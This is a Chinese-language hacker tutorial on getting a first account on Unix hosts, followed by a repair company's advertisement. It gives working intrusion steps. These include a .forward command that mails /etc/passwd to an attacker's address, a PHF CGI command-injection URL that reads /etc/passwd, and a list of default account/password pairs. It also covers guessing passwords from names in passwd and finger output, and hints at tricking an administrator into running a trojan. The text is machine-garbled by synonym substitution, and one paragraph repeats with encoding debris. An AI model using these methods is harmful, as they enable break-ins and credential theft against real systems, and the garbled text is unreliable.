入侵系统获如何得第一个帐号

  作者：enterchang 来源：http://www.hackyun.com/
  我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再使用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是使用系统毛病还是得到SHADOW都是有一定纪律可寻的,通常你到一些黑客站点找到对应系统相应版本的
  XPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积聚了一些经验,想写出来和大家交换一下,盼望能抛砖引玉,请高手们把更好的方法报告我.
  确定了目的当前,我通常是先用匿名FTP去看一下,很多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(固然是假的),进入后到/etc目次下把PASSWD拿返来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时间会有比力傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目次是drwxr-xr-x，做一个.foward文件传上去，在UNIX下的下令应该是echo"　
  /bin/cat /etc/passwd　sed 's/^/ /'　/bin/mail me@my.e-mail.addr" >
  .forward然后给匿名用户写一封信，它会把PASSWD发给你。
  如果目的没有匿名FTP,就经过WWW拜访它的主页,看看上面有什么信息,比方经过一些接洽人的EMAIL你就可以发明一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是价值千金.把这些帐号记下来,非常有效.
  以上几个方法都不行的话,那就试试PHF盘问.在欣赏器的地址栏输出http://打击目的/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-<
  还可以使用目的的FINGER功能来积聚帐号,如使用HAKTEK(一种扫描器)来监督目的,一旦有人登岸该主机就会报告给你.但这种方法的缺点就是糜费时间,如果你是本身费钱上网的话可就要出血了!
  很有可能以上的方法都不行,那只好使出我的看家本领了-------猜!!!有一些系统默许的帐号,比方:
  帐号　　　　 密码
  ----------- ----------------
  root　　　　root
  sys　　　 　sys/system/bin
  bin　　　　 sys/bin
  mountfsys　 mountfsys
  adm　　　　 adm
  uucp　　　　uucp
  nuucp　　　 anon
  anon　　　　anon
  user　　　　user
  games　　　 games
  install　　 install
  reboot　　　给 "command login" 用的
  demo　　　　demo
  umountfsys　umountfsys
  sync　　　　 sync
  admin　　　 admin
  guest　　　 guest
  daemon　　　daemon
  ________________________________________________________________
  有些管理员忘记把他们改失,那你就发达了!
  另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.
  只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,重要办法还是猜.如果是经过PASSWD晓得帐号的那你应该会发明该用户的很多信息,比方:
  .........
  xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
  qingyuan:x:275:50::/usr/qingyuan:/bin/sh
  hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
  smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
  kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh
  brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh
  tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh
  ............
  这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比力高的.
  如果是用其他方法获得帐号的,就用FINGER盘问来获得相干信息.比方晓得一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息比方真名实姓,德律风号码等就用这些做密码来猜%22%3e如果是用其他方法获得帐号的,就用FINGER盘问来获得相干信息.比方晓得一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息比方真名实姓,德律风号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER盘问来获得相干信息.比方晓得一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息比方真名实姓,德律风号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER盘问来获得相干信息.比方晓得一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息比方真名实姓,德律风号码等就用这些做密码来猜
  固然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番光阴来猜的.
  如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.不然,你的德律风费就要.....而且这种方法比力危险,还是不消为好.
  末了实在不行还有一种比力卑鄙的本领，就是给该网站的网管写封信，想办法骗他执行特洛伊木马，然后再.......算了,不说了.
  你可能发明以上这些方法都不能百分之百的成功,或者说成功率是比力低的,由于我也不晓得更好的方法.但我感触一定有一种更好的方法,盼望有高手见到此文能报告我。
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：